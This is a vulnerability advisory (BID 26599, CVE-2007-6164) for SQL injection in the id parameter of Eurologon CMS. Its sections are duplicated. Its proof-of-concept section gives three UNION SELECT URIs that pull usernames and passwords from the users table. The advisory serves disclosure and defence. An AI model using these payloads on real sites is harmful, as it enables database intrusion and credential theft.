Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities
BID:26599
Info
Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26599 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6164 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 27 2007 12:00AM |
| Updated: | Dec 18 2007 08:05PM |
| Credit: | KiNgOfThEwOrLd is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Eurologon Eurologon CMS 0 |
| Not Vulnerable: | |
Discussion
Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities
Eurologon CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Eurologon CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/reviews.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://www.example.com/links.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://www.example.com/articles.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/reviews.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://www.example.com/links.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://www.example.com/articles.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
Solution / Fix
Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Eurologon CMS ID Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (Eurologon)
- Eurologon CMS Multiple SQL Injection ([email protected] )